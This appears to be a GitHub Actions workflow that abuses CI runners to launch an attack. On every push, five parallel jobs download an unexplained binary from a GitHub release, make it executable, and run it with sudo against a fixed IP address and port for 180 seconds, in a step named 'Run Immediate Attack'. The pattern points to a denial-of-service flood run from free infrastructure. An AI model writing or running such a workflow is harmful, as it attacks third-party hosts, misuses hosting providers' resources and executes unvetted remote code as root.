name: VISHAL PAPA 
on: 
  workflow_dispatch:
  push: {}

jobs:
  attack:
    runs-on: ubuntu-latest
    timeout-minutes: 5
    strategy:
      matrix:
        instance: [1, 2, 3, 4, 5]
    steps:
      - name: Download Binary (ULTRA FAST)
        run: |
          wget -q https://github.com/Vishalisback00/Vishalpapaisback/releases/download/Personal/vishal
          chmod +x vishal
      
      - name: Run Immediate Attack
        run: sudo ./vishal 20.193.224.153 18792 180 
        continue-on-error: true
